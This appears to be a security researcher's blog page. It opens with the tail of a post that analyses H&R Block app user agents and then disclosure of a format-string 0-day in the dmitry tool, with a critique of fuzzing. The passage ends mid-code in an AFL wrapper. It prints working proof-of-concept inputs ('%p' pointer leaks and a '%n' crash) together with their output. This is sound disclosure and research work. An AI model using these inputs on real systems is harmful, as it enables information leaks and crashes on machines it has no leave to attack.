        <span class="nb">print</span><span class="p">(</span><span class="s1">'Usage: </span><span class="si">%s</span><span class="s1"> <tax-year> [filter] <filepath>'</span> <span class="o">%</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
        <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
        <span class="nb">filter</span> <span class="o">=</span> <span class="kc">None</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="nb">filter</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">],</span> <span class="s1">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">ifile</span><span class="p">:</span>
        <span class="n">data</span> <span class="o">=</span> <span class="p">[</span><span class="n">line</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">ifile</span> <span class="k">if</span> <span class="n">is_hrb</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nb">filter</span><span class="p">,</span> <span class="n">line</span><span class="p">)]</span>
    <span class="n">buckets</span> <span class="o">=</span> <span class="p">{</span>
        <span class="s1">'OS'</span><span class="p">:</span> <span class="p">{</span>
            <span class="s1">'IOS'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
            <span class="s1">'ANDROID'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="s1">'DEVICE'</span><span class="p">:</span> <span class="p">{</span>
            <span class="s1">'PHONE'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
            <span class="s1">'TABLET'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="s1">'APP'</span><span class="p">:</span> <span class="p">{</span>
            <span class="s1">'MYBLOCK'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
            <span class="s1">'TAXES'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="s1">'AUTH'</span><span class="p">:</span> <span class="p">{</span>
            <span class="s1">'TOUCHID'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
            <span class="s1">'FACEID'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
            <span class="s1">'N/A'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="s1">'VERSION'</span><span class="p">:</span> <span class="p">{},</span>
        <span class="s1">'BROWSER'</span><span class="p">:</span> <span class="p">{},</span>
    <span class="p">}</span>
    <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span>
        <span class="n">tokens</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">','</span><span class="p">)</span>
        <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">3</span><span class="p">:</span>
            <span class="nb">print</span><span class="p">(</span><span class="s1">'WARNING: Cannot tokenize: </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="n">line</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
            <span class="k">continue</span>
        <span class="n">subtokens</span> <span class="o">=</span> <span class="n">parse_subtokens</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'-'</span><span class="p">))</span>
        <span class="k">if</span> <span class="n">subtokens</span> <span class="ow">is</span> <span class="kc">None</span><span class="p">:</span>
            <span class="nb">print</span><span class="p">(</span><span class="s1">'WARNING: Cannot subtokenize: </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'-'</span><span class="p">),</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
            <span class="k">continue</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">count</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span>
        <span class="k">except</span> <span class="ne">ValueError</span><span class="p">:</span>
            <span class="nb">print</span><span class="p">(</span><span class="s1">'WARNING: Could not parse count from: </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="n">line</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
            <span class="k">continue</span>
        <span class="n">buckets</span><span class="p">[</span><span class="s1">'OS'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'OS'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
        <span class="n">buckets</span><span class="p">[</span><span class="s1">'DEVICE'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'DEVICE'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
        <span class="n">buckets</span><span class="p">[</span><span class="s1">'APP'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'APP'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
        <span class="n">buckets</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
        <span class="k">if</span> <span class="n">subtokens</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="ow">in</span> <span class="n">buckets</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]:</span>
            <span class="n">buckets</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">buckets</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]]</span> <span class="o">=</span> <span class="n">count</span>
        <span class="k">if</span> <span class="n">subtokens</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]</span> <span class="ow">in</span> <span class="n">buckets</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]:</span>
            <span class="n">buckets</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">buckets</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]]</span> <span class="o">=</span> <span class="n">count</span>
    <span class="nb">print</span><span class="p">(</span><span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">buckets</span><span class="p">,</span> <span class="n">indent</span><span class="o">=</span><span class="mi">4</span><span class="p">))</span>
</code></pre></div>
<p>I've been collecting this data since 2016 and I'm happy to share upon request.</p>
<h2>Results</h2>
<p>Here are the results for 2020, in no particular order:</p>
<ul>
<li>From January 13 through April 14, <strong>0</strong> requests were made by MyBlock and <strong>563,138</strong> by Taxes.</li>
<li><strong>545,368</strong> requests were made from phones and <strong>17,770</strong> from tablets; about
<strong>97%</strong> of the requests came from phones.</li>
<li><strong>100%</strong> of requests were made by devices running iOS.</li>
<li>Seven versions of Taxes appear in the dataset: <strong>9.2.0</strong>, <strong>9.2.1</strong>, <strong>9.3.0</strong>, <strong>9.3.1</strong>, <strong>9.4.0</strong>, <strong>9.5.0</strong>, and <strong>9.6.0</strong>.</li>
<li><strong>0.2%</strong> of requests contain "Mozilla" in the user-agent.</li>
</ul>
<p>And the security question from the original blog post:</p>
<ul>
<li><strong>221,827</strong> requests used TouchID, <strong>265,313</strong> FaceID,
and <strong>75,998</strong> showed neither keyword;
<strong>39%</strong>, <strong>47%</strong>, and <strong>14%</strong>, respectively.</li>
</ul>
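<p>The percentages above are simple shares of the total. As a minimal sketch (the helper <code>shares</code> is hypothetical and not part of the script above), one category of the script's JSON output can be turned into percentages like this. Run on the 2020 counts, it gives 96.8% phones and 3.2% tablets, and 39.4%, 47.1%, and 13.5% for TouchID, FaceID, and neither.</p>

```python
import json


def shares(counts):
    """Convert a {label: count} mapping to {label: percent of total}.

    Hypothetical helper: `counts` is one category (e.g. "DEVICE" or "AUTH")
    from the JSON the script prints. Percentages are rounded to 0.1%.
    """
    total = sum(counts.values())
    if total == 0:
        # Avoid dividing by zero for an empty category.
        return {label: 0.0 for label in counts}
    return {label: round(100 * n / total, 1) for label, n in counts.items()}


if __name__ == "__main__":
    # 2020 counts as reported in the bullets above.
    buckets = {
        "DEVICE": {"PHONE": 545368, "TABLET": 17770},
        "AUTH": {"TOUCHID": 221827, "FACEID": 265313, "N/A": 75998},
    }
    for category in ("DEVICE", "AUTH"):
        print(category, json.dumps(shares(buckets[category])))
```

<p>In practice the <code>buckets</code> dictionary would come from <code>json.load</code> on the script's saved output rather than being typed in by hand.</p>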
<h2>Comparison to 2019</h2>
<ul>
<li>In 2019, the majority of requests were made by Taxes. Now in 2020, only Taxes appears in the data.</li>
<li>The share of requests using TouchID, FaceID, and neither changed by <strong>-20</strong>, <strong>+21</strong>, and <strong>-1</strong> percentage points, respectively.</li>
</ul>
<h2>Discussion</h2>
<p>I'm no longer seeing requests from Android devices or the MyBlock app, implying that they have either
been discontinued or stopped using the original custom user agents.</p>
<p>We've also reached the point where FaceID has finally overtaken TouchID. Here's a graphic capturing
the change:</p>
<p><center>
<img alt="Chart" src="https://carteryagemann.com/images/hrb-auth-2018-2020.png">
</center></p>
<p>We'll see next year how the trends change. Thanks for reading!</p>Fuzzers Suck: New 0-Day Shows We Need To Do Better2020-06-18T11:50:00-04:002020-06-18T11:50:00-04:00Carter Yagemanntag:carteryagemann.com,2020-06-18:/fuzzer-suck-we-need-to-do-better.html<p><a href="https://en.wikipedia.org/wiki/Fuzzing">Fuzz testing</a> (more commonly known as "fuzzing")
has become a predominant technique for bug hunting because it's easy to deploy and yields
results. Academic security research is now flooded with papers on the topic (USENIX Security
alone accepted <strong>7</strong> <a href="https://www.usenix.org/conference/usenixsecurity20/fall-accepted-papers">papers</a>
in the 2020 Fall submission cycle), many of which propose incremental improvements that'll
be obsolete by next year.</p>
<p>Meanwhile, plenty of serious bugs are slipping through our nets. Take a look at this
<a href="https://github.com/jaygreig86/dmitry/issues/3">0-day</a> my team found in a piece of
software from 2016, which is readily available in major Linux distros like
<a href="https://packages.debian.org/buster/dmitry">Debian</a>, <a href="https://packages.ubuntu.com/eoan/dmitry">Ubuntu</a>,
and <a href="https://tools.kali.org/information-gathering/dmitry">Kali</a>:</p>
<div class="highlight"><pre><span></span><code><span class="err">$</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">dmitry</span><span class="w"> </span><span class="s">"%p %p %p %p %p %p"</span>
<span class="nx">Deepmagic</span><span class="w"> </span><span class="nx">Information</span><span class="w"> </span><span class="nx">Gathering</span><span class="w"> </span><span class="nx">Tool</span>
<span class="s">"There be some deep magic going on"</span>
<span class="nx">ERROR</span><span class="p">:</span><span class="w"> </span><span class="nx">Unable</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">locate</span><span class="w"> </span><span class="nx">Host</span><span class="w"> </span><span class="nx">IP</span><span class="w"> </span><span class="kd">addr</span><span class="p">.</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span>
<span class="nx">Continuing</span><span class="w"> </span><span class="nx">with</span><span class="w"> </span><span class="nx">limited</span><span class="w"> </span><span class="nx">modules</span>
<span class="nx">HostIP</span><span class="p">:</span>
<span class="nx">HostName</span><span class="p">:</span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span><span class="w"> </span><span class="o">%</span><span class="nx">p</span>
<span class="nx">Gathered</span><span class="w"> </span><span class="nx">Inic</span><span class="o">-</span><span class="nx">whois</span><span class="w"> </span><span class="nx">information</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="mh">0x5598e89e9b47</span><span class="w"> </span><span class="p">(</span><span class="nx">nil</span><span class="p">)</span><span class="w"> </span><span class="p">(</span><span class="nx">nil</span><span class="p">)</span><span class="w"> </span><span class="mh">0x7ffc2f4878e0</span><span class="w"> </span><span class="mh">0x7f721845de80</span><span class="w"> </span><span class="p">(</span><span class="nx">nil</span><span class="p">)</span>
<span class="p">[</span><span class="o">...</span><span class="p">]</span>
</code></pre></div>
<p>This is a textbook example of an externally controlled format string vulnerability
(<a href="https://cwe.mitre.org/data/definitions/134.html">CWE-134</a>): each <code>%p</code> in the argument is
treated as a conversion specifier and prints a leaked pointer value instead of literal text. It sits in a program
that's trivial to fuzz and in which others have already found <a href="https://www.exploit-db.com/exploits/41898">vulnerabilities</a>.
How did such a simple problem go unreported?</p>
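<p>The problem is that <strong>fuzzing assumes vulnerabilities will easily trigger crashes</strong>. Unfortunately,
this 0-day demonstrates an entire class of bugs where that isn't the case: a <code>%p</code> leak like the one
above never crashes. Triggering a crash requires a specifier such as <code>%n</code>, which makes <code>printf</code>
write through whatever pointer it finds in the next argument slot. If you know what you're looking for, that's trivial:</p>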
<div class="highlight"><pre><span></span><code><span class="err">$</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">dmitry</span><span class="w"> </span><span class="o">-</span><span class="nx">w</span><span class="w"> </span><span class="o">%</span><span class="nx">n</span>
<span class="nx">Deepmagic</span><span class="w"> </span><span class="nx">Information</span><span class="w"> </span><span class="nx">Gathering</span><span class="w"> </span><span class="nx">Tool</span>
<span class="s">"There be some deep magic going on"</span>
<span class="nx">ERROR</span><span class="p">:</span><span class="w"> </span><span class="nx">Unable</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">locate</span><span class="w"> </span><span class="nx">Host</span><span class="w"> </span><span class="nx">IP</span><span class="w"> </span><span class="kd">addr</span><span class="p">.</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="o">%</span><span class="nx">n</span>
<span class="nx">Continuing</span><span class="w"> </span><span class="nx">with</span><span class="w"> </span><span class="nx">limited</span><span class="w"> </span><span class="nx">modules</span>
<span class="nx">HostIP</span><span class="p">:</span>
<span class="nx">HostName</span><span class="p">:</span><span class="o">%</span><span class="nx">n</span>
<span class="nx">Segmentation</span><span class="w"> </span><span class="nx">fault</span>
</code></pre></div>
<p>But for a fuzzer using typical mutation strategies, stumbling onto such an input is quite difficult:</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="nv">american</span><span class="w"> </span><span class="nv">fuzzy</span><span class="w"> </span><span class="nv">lop</span><span class="w"> </span><span class="mi">2</span>.<span class="mi">52</span><span class="nv">b</span><span class="w"> </span><span class="ss">(</span><span class="nv">wrapper</span><span class="ss">)</span>
┌─<span class="w"> </span><span class="nv">process</span><span class="w"> </span><span class="nv">timing</span><span class="w"> </span>─────────────────────────────────────┬─<span class="w"> </span><span class="nv">overall</span><span class="w"> </span><span class="nv">results</span><span class="w"> </span>─────┐
│<span class="w"> </span><span class="nv">run</span><span class="w"> </span><span class="nv">time</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">days</span>,<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">hrs</span>,<span class="w"> </span><span class="mi">10</span><span class="w"> </span><span class="nv">min</span>,<span class="w"> </span><span class="mi">32</span><span class="w"> </span><span class="nv">sec</span><span class="w"> </span>│<span class="w"> </span><span class="nv">cycles</span><span class="w"> </span><span class="nv">done</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">last</span><span class="w"> </span><span class="nv">new</span><span class="w"> </span><span class="nv">path</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">days</span>,<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">hrs</span>,<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">min</span>,<span class="w"> </span><span class="mi">23</span><span class="w"> </span><span class="nv">sec</span><span class="w"> </span>│<span class="w"> </span><span class="nv">total</span><span class="w"> </span><span class="nv">paths</span><span class="w"> </span>:<span class="w"> </span><span class="mi">31</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">last</span><span class="w"> </span><span class="nv">uniq</span><span class="w"> </span><span class="nv">crash</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">days</span>,<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">hrs</span>,<span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="nv">min</span>,<span class="w"> </span><span class="mi">12</span><span class="w"> </span><span class="nv">sec</span><span class="w"> </span>│<span class="w"> </span><span class="nv">uniq</span><span class="w"> </span><span class="nv">crashes</span><span class="w"> </span>:<span class="w"> </span><span class="mi">2</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">last</span><span class="w"> </span><span class="nv">uniq</span><span class="w"> </span><span class="nv">hang</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">days</span>,<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="nv">hrs</span>,<span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="nv">min</span>,<span class="w"> </span><span class="mi">56</span><span class="w"> </span><span class="nv">sec</span><span class="w"> </span>│<span class="w"> </span><span class="nv">uniq</span><span class="w"> </span><span class="nv">hangs</span><span class="w"> </span>:<span class="w"> </span><span class="mi">4</span><span class="w"> </span>│
├─<span class="w"> </span><span class="nv">cycle</span><span class="w"> </span><span class="nv">progress</span><span class="w"> </span>────────────────────┬─<span class="w"> </span><span class="nv">map</span><span class="w"> </span><span class="nv">coverage</span><span class="w"> </span>─┴───────────────────────┤
│<span class="w"> </span><span class="nv">now</span><span class="w"> </span><span class="nv">processing</span><span class="w"> </span>:<span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="ss">(</span><span class="mi">9</span>.<span class="mi">68</span><span class="o">%</span><span class="ss">)</span><span class="w"> </span>│<span class="w"> </span><span class="nv">map</span><span class="w"> </span><span class="nv">density</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span>.<span class="mi">08</span><span class="o">%</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="mi">0</span>.<span class="mi">24</span><span class="o">%</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">paths</span><span class="w"> </span><span class="nv">timed</span><span class="w"> </span><span class="nv">out</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="ss">(</span><span class="mi">0</span>.<span class="mi">00</span><span class="o">%</span><span class="ss">)</span><span class="w"> </span>│<span class="w"> </span><span class="nv">count</span><span class="w"> </span><span class="nv">coverage</span><span class="w"> </span>:<span class="w"> </span><span class="mi">2</span>.<span class="mi">13</span><span class="w"> </span><span class="nv">bits</span><span class="o">/</span><span class="nv">tuple</span><span class="w"> </span>│
├─<span class="w"> </span><span class="nv">stage</span><span class="w"> </span><span class="nv">progress</span><span class="w"> </span>────────────────────┼─<span class="w"> </span><span class="nv">findings</span><span class="w"> </span><span class="nv">in</span><span class="w"> </span><span class="nv">depth</span><span class="w"> </span>────────────────────┤
│<span class="w"> </span><span class="nv">now</span><span class="w"> </span><span class="nv">trying</span><span class="w"> </span>:<span class="w"> </span><span class="nv">havoc</span><span class="w"> </span>│<span class="w"> </span><span class="nv">favored</span><span class="w"> </span><span class="nv">paths</span><span class="w"> </span>:<span class="w"> </span><span class="mi">13</span><span class="w"> </span><span class="ss">(</span><span class="mi">41</span>.<span class="mi">94</span><span class="o">%</span><span class="ss">)</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">stage</span><span class="w"> </span><span class="nv">execs</span><span class="w"> </span>:<span class="w"> </span><span class="mi">6540</span><span class="o">/</span><span class="mi">24</span>.<span class="mi">6</span><span class="nv">k</span><span class="w"> </span><span class="ss">(</span><span class="mi">26</span>.<span class="mi">61</span><span class="o">%</span><span class="ss">)</span><span class="w"> </span>│<span class="w"> </span><span class="nv">new</span><span class="w"> </span><span class="nv">edges</span><span class="w"> </span><span class="nv">on</span><span class="w"> </span>:<span class="w"> </span><span class="mi">17</span><span class="w"> </span><span class="ss">(</span><span class="mi">54</span>.<span class="mi">84</span><span class="o">%</span><span class="ss">)</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">total</span><span class="w"> </span><span class="nv">execs</span><span class="w"> </span>:<span class="w"> </span><span class="mi">45</span>.<span class="mi">9</span><span class="nv">k</span><span class="w"> </span>│<span class="w"> </span><span class="nv">total</span><span class="w"> </span><span class="nv">crashes</span><span class="w"> </span>:<span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="ss">(</span><span class="mi">2</span><span class="w"> </span><span class="nv">unique</span><span class="ss">)</span><span class="w"> </span>│
│<span class="w"> </span><span class="k">exec</span><span class="w"> </span><span class="nv">speed</span><span class="w"> </span>:<span class="w"> </span><span class="mi">585</span>.<span class="mi">4</span><span class="o">/</span><span class="nv">sec</span><span class="w"> </span>│<span class="w"> </span><span class="nv">total</span><span class="w"> </span><span class="nv">tmouts</span><span class="w"> </span>:<span class="w"> </span><span class="mi">14</span><span class="w"> </span><span class="ss">(</span><span class="mi">4</span><span class="w"> </span><span class="nv">unique</span><span class="ss">)</span><span class="w"> </span>│
├─<span class="w"> </span><span class="nv">fuzzing</span><span class="w"> </span><span class="nv">strategy</span><span class="w"> </span><span class="nv">yields</span><span class="w"> </span>───────────┴───────────────┬─<span class="w"> </span><span class="nv">path</span><span class="w"> </span><span class="nv">geometry</span><span class="w"> </span>────────┤
│<span class="w"> </span><span class="nv">bit</span><span class="w"> </span><span class="nv">flips</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">152</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">148</span>,<span class="w"> </span><span class="mi">1</span><span class="o">/</span><span class="mi">140</span><span class="w"> </span>│<span class="w"> </span><span class="nv">levels</span><span class="w"> </span>:<span class="w"> </span><span class="mi">3</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">byte</span><span class="w"> </span><span class="nv">flips</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">19</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">15</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">7</span><span class="w"> </span>│<span class="w"> </span><span class="nv">pending</span><span class="w"> </span>:<span class="w"> </span><span class="mi">28</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">arithmetics</span><span class="w"> </span>:<span class="w"> </span><span class="mi">5</span><span class="o">/</span><span class="mi">1062</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">75</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">0</span><span class="w"> </span>│<span class="w"> </span><span class="nv">pend</span><span class="w"> </span><span class="nv">fav</span><span class="w"> </span>:<span class="w"> </span><span class="mi">11</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">known</span><span class="w"> </span><span class="nv">ints</span><span class="w"> </span>:<span class="w"> </span><span class="mi">1</span><span class="o">/</span><span class="mi">96</span>,<span class="w"> </span><span class="mi">1</span><span class="o">/</span><span class="mi">420</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">308</span><span class="w"> </span>│<span class="w"> </span><span class="nv">own</span><span class="w"> </span><span class="nv">finds</span><span class="w"> </span>:<span class="w"> </span><span class="mi">30</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">dictionary</span><span class="w"> </span>:<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">0</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">0</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">0</span><span class="w"> </span>│<span class="w"> </span><span class="nv">imported</span><span class="w"> </span>:<span class="w"> </span><span class="nv">n</span><span class="o">/</span><span class="nv">a</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">havoc</span><span class="w"> </span>:<span class="w"> </span><span class="mi">18</span><span class="o">/</span><span class="mi">36</span>.<span class="mi">6</span><span class="nv">k</span>,<span class="w"> </span><span class="mi">0</span><span class="o">/</span><span class="mi">0</span><span class="w"> </span>│<span class="w"> </span><span class="nv">stability</span><span class="w"> </span>:<span class="w"> </span><span class="mi">76</span>.<span class="mi">28</span><span class="o">%</span><span class="w"> </span>│
│<span class="w"> </span><span class="nv">trim</span><span class="w"> </span>:<span class="w"> </span><span class="mi">5</span>.<span class="mi">00</span><span class="o">%/</span><span class="mi">4</span>,<span class="w"> </span><span class="mi">0</span>.<span class="mi">00</span><span class="o">%</span><span class="w"> </span>├────────────────────────┘
└─────────────────────────────────────────────────────┘<span class="w"> </span>[<span class="nv">cpu001</span>:<span class="w"> </span><span class="mi">38</span><span class="o">%</span>]
</code></pre></div>
<p><strong>Side Note:</strong> For repeatability, this is the wrapper code I hacked together to restrict AFL to fuzzing
a single command line argument:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdlib.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><string.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span>
<span class="kt">int</span><span class="w"> </span><span class="n">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">prog</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"./dmitry"</span><span class="p">;</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">flag</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"-w"</span><span class="p">;</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">buf</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">cmd</span><span class="p">[]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="n">prog</span><span class="p">,</span><span class="w"> </span><span class="n">flag</span><span class="p">,</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">};</span>
<span class="w"> </span><span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">;</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">argc</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
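<span class="w"> </span><span class="c1">// The path of the test case to replay arrives as argv[1]</span>
<span class="w"> </span><span class="n">input</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fopen</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="w"> </span><span class="s">"r"</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">input</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="c1">// Copy at most one line of the test case into buf; an empty file would</span>
<span class="w"> </span><span class="c1">// otherwise leave buf uninitialized, so fall back to an empty argument</span>
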